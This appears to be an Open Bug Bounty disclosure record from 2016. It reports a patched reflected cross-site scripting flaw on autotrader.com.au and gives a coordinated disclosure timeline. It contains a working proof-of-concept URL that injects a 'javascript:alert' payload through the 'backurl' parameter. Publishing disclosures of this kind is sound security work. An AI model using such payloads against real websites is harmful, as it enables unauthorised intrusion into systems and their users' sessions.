autotrader.com.au XSS vulnerability

2016-04-08T17:31:00
ID OBB:145366
Type openbugbounty
Reporter Spam404
Modified 2016-07-02T06:11:00

Description

Vulnerable URL:
http://www.autotrader.com.au/cars-for-sale/2015-TOYOTA-RAV4-CRUISER-ASA44R-ATFD3832119?backurl=javascript:alert%28/XSSPOSED/%29&backtext;=CLICKME
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 136016
Google Pagerank| 4
VIP website status:| No
Check autotrader.com.au SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 April, 2016 17:31 GMT
Vulnerability existence verified and confirmed| 9 April, 2016 06:02 GMT
Notification sent to subscribers (without technical details)| 9 April, 2016 10:17 GMT
Vulnerability details disclosed by researcher| 2 July, 2016 06:11 GMT